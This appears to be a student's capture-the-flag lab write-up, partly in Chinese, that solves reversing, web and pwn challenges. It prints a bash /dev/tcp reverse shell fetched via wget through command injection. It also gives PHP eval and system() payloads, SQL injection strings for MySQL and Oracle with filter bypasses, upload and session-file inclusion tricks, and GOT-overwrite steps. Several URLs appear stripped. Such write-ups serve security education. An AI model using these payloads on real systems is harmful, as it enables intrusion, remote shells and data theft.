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Lab 0x01

What The Hell

rev 50 pts FLAG{BABY_REVERSE_123}

跟地獄世界打招呼,摸摸找找 Flag 在哪。


  1. IDA

    if ( argc != 1 && !strcmp(argv[1], "/get_flag") )
  2. $ whatTheHell.exe /get_flag


Back to the Future

rev 50 pts FLAG{PE_!S_EASY}


而時光機的機密因為保存技術而有半衰期會逐年衰變,逐漸變為看不懂的資訊,而時光機本身配有 Time Machine Guard 用來抵抗外來研究員嘗試分析破解時光機。

請嘗試在不觸發 Time Machine Guard 的情況下回到過去盜取製造時光機的機密吧!!!


  1. 前面有複雜的運算跟條件,但其實最後 Buffer 就是 byte_408008, 然後最後 Buffer ^= byte_40801c
  2. 因為 byte_408008byte_40801c 都已知,直接 xor 就有 flag。



rev 100 pts FLAG{y3s!!y3s!!y3s!!0h_my_g0d!!}

ShengHao’s HW1 was too kind, try this.


This program take two value as input. One is seed and another is flag. Use <S-F12> and cross reference in IDA to find main function. There are two important functions related to the input, which are sub_5D1070(v1) and sub_5D1270(&v2). v1 is the seed, and v2 is the flag.

sub\_5D1070(char a1) take seed as parameter. Most of the code are complicated, but only a small part of the function is related to the paramter.

The whole function first search for .data segment, and then find two blocks which start with 15 and 69 seperately. The first block is the comparison target, which is unk_5D4018. The second block will be used in sub_5D1270, and this is the seconde block.

for ( l = j + 33; l < *(_DWORD *)(i + 8); ++l )
  if ( *(_BYTE *)(l + v8) == 69 )
    for ( m = 0; ; ++m )
      result = l + v8;
      if ( !*(_BYTE *)(l + v8 + m) )
      *(_BYTE *)(l + v8 + m) += a1;
    return result;
  result = l + 1;

The code shows that it will find 69 from l + v8, and start adding seed to each of the bytes until reaching 0. We can find the original data by the debugger.


sub\_5D1270(const char \*a1) will copy some data to v2 and execute it as a function. The data is the data mentioned in sub_5D1070(char a1).

if ( strlen(a1) == 32 )
  v2 = VirtualAlloc(0, 0xC8u, 0x1000u, 0x40u);
  qmemcpy(v2, &unk_5D4058, 0xC8u);
  result = ((int (__cdecl *)(const char *, void *))v2)(a1, &unk_5D4018);

The first command of a function usually is push ebp, which is 0x55, and the first byte of the data is 0x45. Thus, the seed should be 16, and we can get the function instructions.

 0:   55                      push   ebp
 1:   8b ec                   mov    ebp,esp
 3:   51                      push   ecx
 4:   c7 45 fc 00 00 00 00    mov    DWORD PTR [ebp-0x4],0x0
 b:   eb 09                   jmp    0x16
 d:   8b 45 fc                mov    eax,DWORD PTR [ebp-0x4]
10:   83 c0 01                add    eax,0x1
13:   89 45 fc                mov    DWORD PTR [ebp-0x4],eax
16:   8b 4d 0c                mov    ecx,DWORD PTR [ebp+0xc]
19:   03 4d fc                add    ecx,DWORD PTR [ebp-0x4]
1c:   0f be 11                movsx  edx,BYTE PTR [ecx]
1f:   85 d2                   test   edx,edx
21:   74 25                   je     0x48
23:   8b 45 08                mov    eax,DWORD PTR [ebp+0x8]
26:   03 45 fc                add    eax,DWORD PTR [ebp-0x4]
29:   0f be 08                movsx  ecx,BYTE PTR [eax]
2c:   83 c1 23                add    ecx,0x23
2f:   83 f1 66                xor    ecx,0x66
32:   0f be d1                movsx  edx,cl
35:   8b 45 0c                mov    eax,DWORD PTR [ebp+0xc]
38:   03 45 fc                add    eax,DWORD PTR [ebp-0x4]
3b:   0f be 08                movsx  ecx,BYTE PTR [eax]
3e:   3b d1                   cmp    edx,ecx
40:   74 04                   je     0x46
42:   33 c0                   xor    eax,eax
44:   eb 07                   jmp    0x4d
46:   eb c5                   jmp    0xd
48:   b8 01 00 00 00          mov    eax,0x1
4d:   8b e5                   mov    esp,ebp
4f:   5d                      pop    ebp
50:   c3                      ret

We know unk_5D4018, and we can just reverse the calculation and get the flag.

Lab 0x03


web 50 pts FLAG{HaoChihDeSuSiZaiJhengSian}




The php shows that it take $_GET['🍣'] as input and pass it to die().

# cat index.php
// PHP is the best language for hacker
// Find the flag !!
$_ = $_GET['🍣'];

if( strpos($_, '"') !== false || strpos($_, "'") !== false )
    die('Bad Hacker :(');

eval('die("' . substr($_, 0, 16) . '");');

There is a php magic $msg = "${@phpinfo()}". We can requeset🍣=${@system(ls)} and get file names.

flag_name_1s_t00_l0ng_QAQQQQQQ index.php phpinfo.php

We can not use ${@system(cat flag_name_1s_t00_l0ng_QAQQQQQQ)} because we can only input string length under 16. But we can access the file directly through and get the flag.


web 50 pts FLAG{me0w!m3ow!meow!}



It is common to know that you can use %0A as a delimiter. I use curl to verify that this is work.

The first thought is to use nc to create a reverse shell. However, there is no nc on the server. I want to use bash -i >& /dev/tcp/<ip>/<port> 0>&1 to creat reverse shell, but we can not use > and & because of the filter.

It comes to mind that I can use wget to download the file with the cmd to the server, and execute it on the server.

First, create file server by python -m http.server <port1>.

bash -i >& /dev/tcp/$1/$2 0>&1

Then create listen port with nc -vv -l -p <port2> and query<ip>:<port1>/<ip>%20<port2>%0a

No Password

web 50 pts FLAG{baby_first_sqlinj}

Login as admin!


It's a simple SQLi, and the payload is shown on the page. Both username and password input a" or "a"="a.



web 100 pts FLAG{baby_recon_dont_forget_to_look_github_page}

Exploit the unexploitable!


There is nothing useful Javascript, Cookies, or Headers. Try to identify which type of web backend is used, and find out that this is an static page Try to access .git or .index.swp, and find out that this is an GitHub Pages by the error page.

By the document of Github Page, we can use dig WWW.EXAMPLE.COM +nostats +nocomments +nocmd to find original github page.

; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> +nostats +nocomments +nocmd
;; global options: +cmd
;       IN      A 2993   IN      CNAME   2993    IN      A   2993    IN      A   2993    IN      A   2993    IN      A

Access, and there is nothing related to the flag. Maybe the file had been deleted. Try to find it in the commits, and find out that there is an commit called delete secret file. The flag is in the file.

Safe R/W

web 200 pts FLAG{w3lc0me_t0_th3_PHP_W0r1d}

I implemented the safest php file reader/writer!

Hack me if you can :p

Ps. open_basedir=/var/www/html/


First, the content length can be easily bypass with c[] instead of c. We send normal and illegal payload at the same time to trigger race condition.

$ ./ | $ ./ '<?php system("ls -al /")'
$ ./ | $ ./ '<?php system("cat /flag_is_here")'

Lab 0x04


web 50 pts FLAG{simple_upload_practice_lol}

file upload is so dangerous!


The web will check the file extension by pathinfo, and pathinfo will return only the last extension. If we upload file.php.jpg, the web server will treat this file as php file and execute it because apache server will keep finding the file extension from the back until it find a valid one. After upload the file, access the uploaded file with<filename>


web 50 pts FLAG{lfi_session_is_so_coool}

There are two functions in the php code, which are register and module. It is abvious that use register to write something and use module to load it.

First, we try to write user=<?php phpinfo(); ?> in the $_SESSION['user']. We try to access default path of session files and failed.<sessionID>

Then we try to access the location without s, and it works.<sessionID>

We change <?php phpinfo(); ?> to <?php system("<cmd>"); ?> and get the flag.


web 50 pts FLAG{union_based_sqlinj_is_sooooooooo_easy}

Try your first Union-based SQL Injection!


Use 1 and 2=2 to verify that this SQLi is number type. Use order by to find out the number of columns. Use union select to know which columns will be shown on the web page. and 2=2 order by 3 union select 1,2,3

Find all information we need.

# show databases,2,GROUP_CONCAT(schema_name)%20from%20information_schema.schemata
/* information_schema,fl4g,mysql,news,test */

# show tables of fl4g,2,GROUP_CONCAT(table_name)%20from%20information_schema.tables%20where%20table_schema=%27fl4g%27
/* secret */

# show columns of fl4g.secret,2,GROUP_CONCAT(column_name)%20from%20information_schema.columns%20where%20table_name=%27secret%27
/* id,THIS_IS_FLAG_YO */

# dump data in fl4g.secret.THIS_IS_FLAG_YO,2,THIS_IS_FLAG_YO%20from%20fl4g.secret
/* FLAG{union_based_sqlinj_is_sooooooooo_easy} */


Cathub v2

web 150 FLAG{hey___or@cle_d4tab4s3__inj3cti0n_i5____to0OoO0ooO0OO_e4sy!!!!!??}

jin-duen-jiang is too easy, let's play cathub!


There are two suspicious entrypoints, which are index.php?search= and video.php?vid=. Try video.php?vid=2-1 and get the same page of video.php?vid=1.

Then we try to get column number by using video.php?vid=1 order by 1 and get blocked. After some trial and find out that space is blocked. We try to use /**/ to bypass and finally know the column number is 3.**/order/**/by/**/3

We try to use union select 1,2,3 and get an error. The database may not MySQL. Then we try union select NULL,NULL,NULL from dual and succeed, which indicate that the database is oracle.**/union/**/select/**/NULL,NULL,NULL/**/from/**/dual

Because the database is oracle, the column type must be correct. We try union select 1,USER,null, and know we should put the expect result in the seconde column.**/union/**/select/**/1,USER,NULL/**/from/**/dual

We try to get owners of tables, but we failed to use rownum.

The reason is that rownum need to be used with subqueries.**/union/**/select/**/distinct/**/1,owner,NULL/**/from/**/all_tables

So we try to concat rows like GROUP_CONCAT in MySQL, and use user_tables instead of all_tables**/union/**/select/**/1,LISTAGG(table_name,NULL)/**/WITHIN/**/GROUP/**/(ORDER/**/BY/**/table_name),NULL/**/from/**/user_tables

Because we can not split the table name, we add some character between them with to_char.

CHR() and quote are blocked.**/union/**/select/**/1,LISTAGG(table_name,to_char(121))/**/WITHIN/**/GROUP/**/(ORDER/**/BY/**/table_name),NULL/**/from/**/user_tables

Use the same way to get column names.**/union/**/select/**/1,LISTAGG(column_name,to_char(121))/**/WITHIN/**/GROUP/**/(ORDER/**/BY/**/table_name),NULL/**/from/**/USER_TAB_COLUMNS

Use table name s3cret and column name v3ry_s3cret_c0lumn**/union/**/select/**/1,v3ry_s3cret_c0lumn,NULL/**/from/**/s3cret

The flag is render by CSS, the true flag is


Lab 0x05


pwn 50 FLAG{Pwned_7he_f1rs7_b1n4ry}

Buffer Overflow.

bof bof.c

nc 10170

There is a function try_to_call_me() which will call system("sh"). Use checksec to ensure that there is no PIE and canary.

There is a small problem that after the bof success, the system("sh") does not work. The reason is that there is assembly code checking the address to align to 16byte. For more details, check here.


pwn 50 FLAG{H0w_2_she1lc0d1ng}

Shellcoding is fun :D


nc 10171

Flag is at /home/orw/flag

The program can only execute open(), read(), and write().

I haven't find how yet.

Just use shellcraft in pwntools to generate the shell code.



pwn 100 FLAG{0verf1ow_1n_ev3rywhere!}

Welcome to edu casino. Hacker don't need luck :P

casino casino.c Ps. The flag is on the server, you need to get shell.

nc 10172

We need to find the injection point first. read_int() use __read_chk, which is not likely to cause bof. Finally, we found that there is a injection point. The code does not check the range of the idx, which cause an arbitrary write vulnerability.

printf( "Change the number? [1:yes 0:no]: " );
if( read_int() == 1 ){
  printf( "Which number [1 ~ 6]: " );
  idx = read_int() - 1;
  printf( "Chose the number %d: " , idx );
  guess[idx] = read_int();

With the injection point, we can do got hijacking. We can not choose printf because the function will be used at the second trial. We can only choose puts as our target.

Because we can not leak libc address, we can only use puts to jump to a buffer, which we can control the contents. The name is a pretty good choice because of the large space.

After we write the shell code at the name, we also overwrote the seed for random function, which let the seed be controlled.

We can guess the numbers twice. In the first trial, modify the lower 4 bytes of the puts got to name. In the second trial, modify the higher 4 bytes of the puts got to name, which is 0, and guess the numbers right with the control of the seed.


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